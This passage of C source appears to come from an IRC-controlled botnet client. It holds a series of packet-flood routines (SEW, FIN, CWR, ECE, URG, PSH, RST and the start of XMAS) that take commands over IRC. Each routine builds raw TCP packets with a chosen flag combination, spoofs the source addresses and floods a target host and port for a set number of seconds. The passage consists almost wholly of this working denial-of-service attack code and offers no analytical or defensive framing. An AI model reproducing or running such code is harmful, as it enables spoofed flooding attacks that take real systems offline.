| |
| 632 | struct send_tcp send_tcp; | |
| 633 | struct pseudo_header pseudo_header; | |
| 634 | struct sockaddr_in sin; | |
| 635 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 636 | unsigned int psize=20, source, dest, check; | |
| 637 | unsigned long saddr, daddr,secs; | |
| 638 | int get; | |
| 639 | time_t start=time(NULL); | |
| 640 | if (mfork(sender) != 0) return; | |
| 641 | if (argc < 3) {
| |
| 642 | Send(sock,"NOTICE %s :SEW <target> <port> <secs>\n",sender); | |
| 643 | exit(1); | |
| 644 | } | |
| 645 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 646 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 647 | daddr=host2ip(sender,argv[1]); | |
| 648 | secs=atol(argv[3]); | |
| 649 | dest=htons(atoi(argv[2])); | |
| 650 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 651 | send_tcp.ip.ihl = 5; | |
| 652 | send_tcp.ip.version = 4; | |
| 653 | send_tcp.ip.tos = 16; | |
| 654 | send_tcp.ip.frag_off = 64; | |
| 655 | send_tcp.ip.ttl = 255; | |
| 656 | send_tcp.ip.protocol = 6; | |
| 657 | send_tcp.tcp.doff = 5; | |
| 658 | send_tcp.tcp.res1 = 3; | |
| 659 | send_tcp.tcp.cwr = 0; | |
| 660 | send_tcp.tcp.ece = 0; | |
| 661 | send_tcp.tcp.urg = 0; | |
| 662 | send_tcp.tcp.ack = 0; | |
| 663 | send_tcp.tcp.psh = 0; | |
| 664 | send_tcp.tcp.rst = 0; | |
| 665 | send_tcp.tcp.fin = 0; | |
| 666 | send_tcp.tcp.syn = 1; | |
| 667 | send_tcp.tcp.window = 30845; | |
| 668 | send_tcp.tcp.urg_ptr = 0; | |
| 669 | while(1) {
| |
| 670 | saddr=getspoof(); | |
| 671 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 672 | send_tcp.ip.tot_len = htons(40+psize); | |
| 673 | send_tcp.ip.id = rand(); | |
| 674 | send_tcp.ip.check = 0; | |
| 675 | send_tcp.ip.saddr = saddr; | |
| 676 | send_tcp.ip.daddr = daddr; | |
| 677 | send_tcp.tcp.source = rand(); | |
| 678 | send_tcp.tcp.dest = dest; | |
| 679 | send_tcp.tcp.seq = rand(); | |
| 680 | send_tcp.tcp.ack_seq = rand(); | |
| 681 | send_tcp.tcp.check = 0; | |
| 682 | sin.sin_family = AF_INET; | |
| 683 | sin.sin_port = send_tcp.tcp.dest; | |
| 684 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 685 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 686 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 687 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 688 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 689 | pseudo_header.placeholder = 0; | |
| 690 | pseudo_header.protocol = IPPROTO_TCP; | |
| 691 | pseudo_header.tcp_length = htons(20+psize); | |
| 692 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 693 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 694 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 695 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 696 | if (a >= 50) {
| |
| 697 | if (time(NULL) >= start+secs) exit(0); | |
| 698 | a=0; | |
| 699 | } | |
| 700 | a++; | |
| 701 | } | |
| 702 | close(get); | |
| 703 | exit(0); | |
| 704 | } | |
| 705 | void fin(int sock, char *sender, int argc, char **argv) {
| |
| 706 | struct send_tcp send_tcp; | |
| 707 | struct pseudo_header pseudo_header; | |
| 708 | struct sockaddr_in sin; | |
| 709 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 710 | unsigned int psize=20, source, dest, check; | |
| 711 | unsigned long saddr, daddr,secs; | |
| 712 | int get; | |
| 713 | time_t start=time(NULL); | |
| 714 | if (mfork(sender) != 0) return; | |
| 715 | if (argc < 3) {
| |
| 716 | Send(sock,"NOTICE %s :FIN <target> <port> <secs>\n",sender); | |
| 717 | exit(1); | |
| 718 | } | |
| 719 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 720 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 721 | daddr=host2ip(sender,argv[1]); | |
| 722 | secs=atol(argv[3]); | |
| 723 | dest=htons(atoi(argv[2])); | |
| 724 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 725 | send_tcp.ip.ihl = 5; | |
| 726 | send_tcp.ip.version = 4; | |
| 727 | send_tcp.ip.tos = 16; | |
| 728 | send_tcp.ip.frag_off = 64; | |
| 729 | send_tcp.ip.ttl = 255; | |
| 730 | send_tcp.ip.protocol = 6; | |
| 731 | send_tcp.tcp.doff = 5; | |
| 732 | send_tcp.tcp.res1 = 0; | |
| 733 | send_tcp.tcp.cwr = 0; | |
| 734 | send_tcp.tcp.ece = 0; | |
| 735 | send_tcp.tcp.urg = 0; | |
| 736 | send_tcp.tcp.syn = 0; | |
| 737 | send_tcp.tcp.psh = 0; | |
| 738 | send_tcp.tcp.rst = 0; | |
| 739 | send_tcp.tcp.fin = 1; | |
| 740 | send_tcp.tcp.ack = 1; | |
| 741 | send_tcp.tcp.window = 30845; | |
| 742 | send_tcp.tcp.urg_ptr = 0; | |
| 743 | while(1) {
| |
| 744 | saddr=getspoof(); | |
| 745 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 746 | send_tcp.ip.tot_len = htons(40+psize); | |
| 747 | send_tcp.ip.id = rand(); | |
| 748 | send_tcp.ip.check = 0; | |
| 749 | send_tcp.ip.saddr = saddr; | |
| 750 | send_tcp.ip.daddr = daddr; | |
| 751 | send_tcp.tcp.source = rand(); | |
| 752 | send_tcp.tcp.dest = dest; | |
| 753 | send_tcp.tcp.seq = rand(); | |
| 754 | send_tcp.tcp.ack_seq = rand(); | |
| 755 | send_tcp.tcp.check = 0; | |
| 756 | sin.sin_family = AF_INET; | |
| 757 | sin.sin_port = send_tcp.tcp.dest; | |
| 758 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 759 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 760 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 761 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 762 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 763 | pseudo_header.placeholder = 0; | |
| 764 | pseudo_header.protocol = IPPROTO_TCP; | |
| 765 | pseudo_header.tcp_length = htons(20+psize); | |
| 766 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 767 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 768 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 769 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 770 | if (a >= 50) {
| |
| 771 | if (time(NULL) >= start+secs) exit(0); | |
| 772 | a=0; | |
| 773 | } | |
| 774 | a++; | |
| 775 | } | |
| 776 | close(get); | |
| 777 | exit(0); | |
| 778 | } | |
| 779 | void cwr(int sock, char *sender, int argc, char **argv) {
| |
| 780 | struct send_tcp send_tcp; | |
| 781 | struct pseudo_header pseudo_header; | |
| 782 | struct sockaddr_in sin; | |
| 783 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 784 | unsigned int psize=20, source, dest, check; | |
| 785 | unsigned long saddr, daddr,secs; | |
| 786 | int get; | |
| 787 | time_t start=time(NULL); | |
| 788 | if (mfork(sender) != 0) return; | |
| 789 | if (argc < 3) {
| |
| 790 | Send(sock,"NOTICE %s :CWR <target> <port> <secs>\n",sender); | |
| 791 | exit(1); | |
| 792 | } | |
| 793 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 794 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 795 | daddr=host2ip(sender,argv[1]); | |
| 796 | secs=atol(argv[3]); | |
| 797 | dest=htons(atoi(argv[2])); | |
| 798 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 799 | send_tcp.ip.ihl = 5; | |
| 800 | send_tcp.ip.version = 4; | |
| 801 | send_tcp.ip.tos = 16; | |
| 802 | send_tcp.ip.frag_off = 64; | |
| 803 | send_tcp.ip.ttl = 255; | |
| 804 | send_tcp.ip.protocol = 6; | |
| 805 | send_tcp.tcp.doff = 5; | |
| 806 | send_tcp.tcp.res1 = 0; | |
| 807 | send_tcp.tcp.cwr = 1; | |
| 808 | send_tcp.tcp.ack = 1; | |
| 809 | send_tcp.tcp.urg = 0; | |
| 810 | send_tcp.tcp.ece = 0; | |
| 811 | send_tcp.tcp.psh = 0; | |
| 812 | send_tcp.tcp.rst = 0; | |
| 813 | send_tcp.tcp.fin = 0; | |
| 814 | send_tcp.tcp.syn = 0; | |
| 815 | send_tcp.tcp.window = 30845; | |
| 816 | send_tcp.tcp.urg_ptr = 0; | |
| 817 | while(1) {
| |
| 818 | saddr=getspoof(); | |
| 819 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 820 | send_tcp.ip.tot_len = htons(40+psize); | |
| 821 | send_tcp.ip.id = rand(); | |
| 822 | send_tcp.ip.check = 0; | |
| 823 | send_tcp.ip.saddr = saddr; | |
| 824 | send_tcp.ip.daddr = daddr; | |
| 825 | send_tcp.tcp.source = rand(); | |
| 826 | send_tcp.tcp.dest = dest; | |
| 827 | send_tcp.tcp.seq = rand(); | |
| 828 | send_tcp.tcp.ack_seq = rand(); | |
| 829 | send_tcp.tcp.check = 0; | |
| 830 | sin.sin_family = AF_INET; | |
| 831 | sin.sin_port = send_tcp.tcp.dest; | |
| 832 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 833 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 834 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 835 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 836 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 837 | pseudo_header.placeholder = 0; | |
| 838 | pseudo_header.protocol = IPPROTO_TCP; | |
| 839 | pseudo_header.tcp_length = htons(20+psize); | |
| 840 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 841 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 842 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 843 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 844 | if (a >= 50) {
| |
| 845 | if (time(NULL) >= start+secs) exit(0); | |
| 846 | a=0; | |
| 847 | } | |
| 848 | a++; | |
| 849 | } | |
| 850 | close(get); | |
| 851 | exit(0); | |
| 852 | } | |
| 853 | void ece(int sock, char *sender, int argc, char **argv) {
| |
| 854 | struct send_tcp send_tcp; | |
| 855 | struct pseudo_header pseudo_header; | |
| 856 | struct sockaddr_in sin; | |
| 857 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 858 | unsigned int psize=20, source, dest, check; | |
| 859 | unsigned long saddr, daddr,secs; | |
| 860 | int get; | |
| 861 | time_t start=time(NULL); | |
| 862 | if (mfork(sender) != 0) return; | |
| 863 | if (argc < 3) {
| |
| 864 | Send(sock,"NOTICE %s :ECE <target> <port> <secs>\n",sender); | |
| 865 | exit(1); | |
| 866 | } | |
| 867 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 868 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 869 | daddr=host2ip(sender,argv[1]); | |
| 870 | secs=atol(argv[3]); | |
| 871 | dest=htons(atoi(argv[2])); | |
| 872 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 873 | send_tcp.ip.ihl = 5; | |
| 874 | send_tcp.ip.version = 4; | |
| 875 | send_tcp.ip.tos = 16; | |
| 876 | send_tcp.ip.frag_off = 64; | |
| 877 | send_tcp.ip.ttl = 255; | |
| 878 | send_tcp.ip.protocol = 6; | |
| 879 | send_tcp.tcp.doff = 5; | |
| 880 | send_tcp.tcp.res1 = 0; | |
| 881 | send_tcp.tcp.cwr = 0; | |
| 882 | send_tcp.tcp.ece = 1; | |
| 883 | send_tcp.tcp.ack = 1; | |
| 884 | send_tcp.tcp.urg = 0; | |
| 885 | send_tcp.tcp.psh = 0; | |
| 886 | send_tcp.tcp.rst = 0; | |
| 887 | send_tcp.tcp.fin = 0; | |
| 888 | send_tcp.tcp.syn = 0; | |
| 889 | send_tcp.tcp.window = 30845; | |
| 890 | send_tcp.tcp.urg_ptr = 0; | |
| 891 | while(1) {
| |
| 892 | saddr=getspoof(); | |
| 893 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 894 | send_tcp.ip.tot_len = htons(40+psize); | |
| 895 | send_tcp.ip.id = rand(); | |
| 896 | send_tcp.ip.check = 0; | |
| 897 | send_tcp.ip.saddr = saddr; | |
| 898 | send_tcp.ip.daddr = daddr; | |
| 899 | send_tcp.tcp.source = rand(); | |
| 900 | send_tcp.tcp.dest = dest; | |
| 901 | send_tcp.tcp.seq = rand(); | |
| 902 | send_tcp.tcp.ack_seq = rand(); | |
| 903 | send_tcp.tcp.check = 0; | |
| 904 | sin.sin_family = AF_INET; | |
| 905 | sin.sin_port = send_tcp.tcp.dest; | |
| 906 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 907 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 908 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 909 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 910 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 911 | pseudo_header.placeholder = 0; | |
| 912 | pseudo_header.protocol = IPPROTO_TCP; | |
| 913 | pseudo_header.tcp_length = htons(20+psize); | |
| 914 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 915 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 916 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 917 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 918 | if (a >= 50) {
| |
| 919 | if (time(NULL) >= start+secs) exit(0); | |
| 920 | a=0; | |
| 921 | } | |
| 922 | a++; | |
| 923 | } | |
| 924 | close(get); | |
| 925 | exit(0); | |
| 926 | } | |
| 927 | void urg(int sock, char *sender, int argc, char **argv) {
| |
| 928 | struct send_tcp send_tcp; | |
| 929 | struct pseudo_header pseudo_header; | |
| 930 | struct sockaddr_in sin; | |
| 931 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 932 | unsigned int psize=20, source, dest, check; | |
| 933 | unsigned long saddr, daddr,secs; | |
| 934 | int get; | |
| 935 | time_t start=time(NULL); | |
| 936 | if (mfork(sender) != 0) return; | |
| 937 | if (argc < 3) {
| |
| 938 | Send(sock,"NOTICE %s :URG <target> <port> <secs>\n",sender); | |
| 939 | exit(1); | |
| 940 | } | |
| 941 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 942 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 943 | daddr=host2ip(sender,argv[1]); | |
| 944 | secs=atol(argv[3]); | |
| 945 | dest=htons(atoi(argv[2])); | |
| 946 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 947 | send_tcp.ip.ihl = 5; | |
| 948 | send_tcp.ip.version = 4; | |
| 949 | send_tcp.ip.tos = 16; | |
| 950 | send_tcp.ip.frag_off = 64; | |
| 951 | send_tcp.ip.ttl = 255; | |
| 952 | send_tcp.ip.protocol = 6; | |
| 953 | send_tcp.tcp.doff = 5; | |
| 954 | send_tcp.tcp.res1 = 0; | |
| 955 | send_tcp.tcp.cwr = 0; | |
| 956 | send_tcp.tcp.ece = 0; | |
| 957 | send_tcp.tcp.syn = 0; | |
| 958 | send_tcp.tcp.fin = 0; | |
| 959 | send_tcp.tcp.psh = 0; | |
| 960 | send_tcp.tcp.rst = 0; | |
| 961 | send_tcp.tcp.urg = 1; | |
| 962 | send_tcp.tcp.ack = 1; | |
| 963 | send_tcp.tcp.window = 30845; | |
| 964 | send_tcp.tcp.urg_ptr = 0; | |
| 965 | while(1) {
| |
| 966 | saddr=getspoof(); | |
| 967 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 968 | send_tcp.ip.tot_len = htons(40+psize); | |
| 969 | send_tcp.ip.id = rand(); | |
| 970 | send_tcp.ip.check = 0; | |
| 971 | send_tcp.ip.saddr = saddr; | |
| 972 | send_tcp.ip.daddr = daddr; | |
| 973 | send_tcp.tcp.source = rand(); | |
| 974 | send_tcp.tcp.dest = dest; | |
| 975 | send_tcp.tcp.seq = rand(); | |
| 976 | send_tcp.tcp.ack_seq = rand(); | |
| 977 | send_tcp.tcp.check = 0; | |
| 978 | sin.sin_family = AF_INET; | |
| 979 | sin.sin_port = send_tcp.tcp.dest; | |
| 980 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 981 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 982 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 983 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 984 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 985 | pseudo_header.placeholder = 0; | |
| 986 | pseudo_header.protocol = IPPROTO_TCP; | |
| 987 | pseudo_header.tcp_length = htons(20+psize); | |
| 988 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 989 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 990 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 991 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 992 | if (a >= 50) {
| |
| 993 | if (time(NULL) >= start+secs) exit(0); | |
| 994 | a=0; | |
| 995 | } | |
| 996 | a++; | |
| 997 | } | |
| 998 | close(get); | |
| 999 | exit(0); | |
| 1000 | } | |
| 1001 | void psh(int sock, char *sender, int argc, char **argv) {
| |
| 1002 | struct send_tcp send_tcp; | |
| 1003 | struct pseudo_header pseudo_header; | |
| 1004 | struct sockaddr_in sin; | |
| 1005 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 1006 | unsigned int psize=20, source, dest, check; | |
| 1007 | unsigned long saddr, daddr,secs; | |
| 1008 | int get; | |
| 1009 | time_t start=time(NULL); | |
| 1010 | if (mfork(sender) != 0) return; | |
| 1011 | if (argc < 3) {
| |
| 1012 | Send(sock,"NOTICE %s :PSH <target> <port> <secs>\n",sender); | |
| 1013 | exit(1); | |
| 1014 | } | |
| 1015 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 1016 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 1017 | daddr=host2ip(sender,argv[1]); | |
| 1018 | secs=atol(argv[3]); | |
| 1019 | dest=htons(atoi(argv[2])); | |
| 1020 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 1021 | send_tcp.ip.ihl = 5; | |
| 1022 | send_tcp.ip.version = 4; | |
| 1023 | send_tcp.ip.tos = 16; | |
| 1024 | send_tcp.ip.frag_off = 64; | |
| 1025 | send_tcp.ip.ttl = 255; | |
| 1026 | send_tcp.ip.protocol = 6; | |
| 1027 | send_tcp.tcp.doff = 5; | |
| 1028 | send_tcp.tcp.res1 = 0; | |
| 1029 | send_tcp.tcp.cwr = 0; | |
| 1030 | send_tcp.tcp.ece = 0; | |
| 1031 | send_tcp.tcp.urg = 0; | |
| 1032 | send_tcp.tcp.rst = 0; | |
| 1033 | send_tcp.tcp.syn = 0; | |
| 1034 | send_tcp.tcp.fin = 0; | |
| 1035 | send_tcp.tcp.psh = 1; | |
| 1036 | send_tcp.tcp.ack = 1; | |
| 1037 | send_tcp.tcp.window = 30845; | |
| 1038 | send_tcp.tcp.urg_ptr = 0; | |
| 1039 | while(1) {
| |
| 1040 | saddr=getspoof(); | |
| 1041 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 1042 | send_tcp.ip.tot_len = htons(40+psize); | |
| 1043 | send_tcp.ip.id = rand(); | |
| 1044 | send_tcp.ip.check = 0; | |
| 1045 | send_tcp.ip.saddr = saddr; | |
| 1046 | send_tcp.ip.daddr = daddr; | |
| 1047 | send_tcp.tcp.source = rand(); | |
| 1048 | send_tcp.tcp.dest = dest; | |
| 1049 | send_tcp.tcp.seq = rand(); | |
| 1050 | send_tcp.tcp.ack_seq = rand(); | |
| 1051 | send_tcp.tcp.check = 0; | |
| 1052 | sin.sin_family = AF_INET; | |
| 1053 | sin.sin_port = send_tcp.tcp.dest; | |
| 1054 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 1055 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 1056 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 1057 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 1058 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 1059 | pseudo_header.placeholder = 0; | |
| 1060 | pseudo_header.protocol = IPPROTO_TCP; | |
| 1061 | pseudo_header.tcp_length = htons(20+psize); | |
| 1062 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 1063 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 1064 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 1065 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 1066 | if (a >= 50) {
| |
| 1067 | if (time(NULL) >= start+secs) exit(0); | |
| 1068 | a=0; | |
| 1069 | } | |
| 1070 | a++; | |
| 1071 | } | |
| 1072 | close(get); | |
| 1073 | exit(0); | |
| 1074 | } | |
| 1075 | void rst(int sock, char *sender, int argc, char **argv) {
| |
| 1076 | struct send_tcp send_tcp; | |
| 1077 | struct pseudo_header pseudo_header; | |
| 1078 | struct sockaddr_in sin; | |
| 1079 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 1080 | unsigned int psize=20, source, dest, check; | |
| 1081 | unsigned long saddr, daddr,secs; | |
| 1082 | int get; | |
| 1083 | time_t start=time(NULL); | |
| 1084 | if (mfork(sender) != 0) return; | |
| 1085 | if (argc < 3) {
| |
| 1086 | Send(sock,"NOTICE %s :RST <target> <port> <secs>\n",sender); | |
| 1087 | exit(1); | |
| 1088 | } | |
| 1089 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 1090 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 1091 | daddr=host2ip(sender,argv[1]); | |
| 1092 | secs=atol(argv[3]); | |
| 1093 | dest=htons(atoi(argv[2])); | |
| 1094 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 1095 | send_tcp.ip.ihl = 5; | |
| 1096 | send_tcp.ip.version = 4; | |
| 1097 | send_tcp.ip.tos = 16; | |
| 1098 | send_tcp.ip.frag_off = 64; | |
| 1099 | send_tcp.ip.ttl = 255; | |
| 1100 | send_tcp.ip.protocol = 6; | |
| 1101 | send_tcp.tcp.doff = 5; | |
| 1102 | send_tcp.tcp.res1 = 0; | |
| 1103 | send_tcp.tcp.cwr = 0; | |
| 1104 | send_tcp.tcp.ece = 0; | |
| 1105 | send_tcp.tcp.urg = 0; | |
| 1106 | send_tcp.tcp.fin = 0; | |
| 1107 | send_tcp.tcp.psh = 0; | |
| 1108 | send_tcp.tcp.rst = 1; | |
| 1109 | send_tcp.tcp.ack = 1; | |
| 1110 | send_tcp.tcp.syn = 0; | |
| 1111 | send_tcp.tcp.window = 30845; | |
| 1112 | send_tcp.tcp.urg_ptr = 0; | |
| 1113 | while(1) {
| |
| 1114 | saddr=getspoof(); | |
| 1115 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 1116 | send_tcp.ip.tot_len = htons(40+psize); | |
| 1117 | send_tcp.ip.id = rand(); | |
| 1118 | send_tcp.ip.check = 0; | |
| 1119 | send_tcp.ip.saddr = saddr; | |
| 1120 | send_tcp.ip.daddr = daddr; | |
| 1121 | send_tcp.tcp.source = rand(); | |
| 1122 | send_tcp.tcp.dest = dest; | |
| 1123 | send_tcp.tcp.seq = rand(); | |
| 1124 | send_tcp.tcp.ack_seq = rand(); | |
| 1125 | send_tcp.tcp.check = 0; | |
| 1126 | sin.sin_family = AF_INET; | |
| 1127 | sin.sin_port = send_tcp.tcp.dest; | |
| 1128 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 1129 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 1130 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 1131 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 1132 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 1133 | pseudo_header.placeholder = 0; | |
| 1134 | pseudo_header.protocol = IPPROTO_TCP; | |
| 1135 | pseudo_header.tcp_length = htons(20+psize); | |
| 1136 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 1137 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 1138 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 1139 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 1140 | if (a >= 50) {
| |
| 1141 | if (time(NULL) >= start+secs) exit(0); | |
| 1142 | a=0; | |
| 1143 | } | |
| 1144 | a++; | |
| 1145 | } | |
| 1146 | close(get); | |
| 1147 | exit(0); | |
| 1148 | } | |
| 1149 | void xmas(int sock, char *sender, int argc, char **argv) {
| |
| 1150 | struct send_tcp send_tcp; | |
| 1151 | struct pseudo_header pseudo_header; | |
| 1152 | struct sockaddr_in sin; | |
| 1153 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 1154 | unsigned int psize=20, source, dest, check; | |
| 1155 | unsigned long saddr, daddr,secs; | |
| 1156 | int get; | |
| 1157 | time_t start=time(NULL); | |
| 1158 | if (mfork(sender) != 0) return; | |
| 1159 | if (argc < 3) {
| |
| 1160 | Send(sock,"NOTICE %s :XMAS <target> <port> <secs>\n",sender); | |
| 1161 | exit(1); | |
| 1162 | } | |
| 1163 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 1164 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 1165 | daddr=host2ip(sender,argv[1]); | |
| 1166 | secs=atol(argv[3]); | |
| 1167 | dest=htons(atoi(argv[2])); | |
| 1168 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 1169 | send_tcp.ip.ihl = 5; | |
| 1170 | send_tcp.ip.version = 4; | |
| 1171 | send_tcp.ip.tos = 16; | |
| 1172 | send_tcp.ip.frag_off = 64; | |
| 1173 | send_tcp.ip.ttl = 255; | |
| 1174 | send_tcp.ip.protocol = 6; | |
| 1175 | send_tcp.tcp.doff = 5; | |
| 1176 | send_tcp.tcp.res1 = 0; | |
| 1177 | send_tcp.tcp.cwr = 0; | |
| 1178 | send_tcp.tcp.ece = 0; | |
| 1179 | send_tcp.tcp.syn = 1; | |
| 1180 | send_tcp.tcp.fin = 1; | |
| 1181 | send_tcp.tcp.urg = 1; | |
| 1182 | send_tcp.tcp.psh = 1; | |
| 1183 | send_tcp.tcp.ack = 1; | |
| 1184 | send_tcp.tcp.rst = 0; | |
| 1185 | send_tcp.tcp.window = 30845; | |
| 1186 | send_tcp.tcp.urg_ptr = 0; | |
| 1187 | while(1) {
| |
| 1188 | saddr=getspoof(); | |
| 1189 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 1190 | send_tcp.ip.tot_len = htons(40+psize); | |
| 1191 | send_tcp.ip.id = rand(); | |
| 1192 | send_tcp.ip.check = 0; | |
| 1193 | send_tcp.ip.saddr = saddr; | |
| 1194 | send_tcp.ip.daddr = daddr; | |
| 1195 | send_tcp.tcp.source = rand(); | |
| 1196 | send_tcp.tcp.dest = dest; | |
| 1197 | send_tcp.tcp.seq = rand(); | |
| 1198 | send_tcp.tcp.ack_seq = rand(); | |
| 1199 | send_tcp.tcp.check = 0; | |
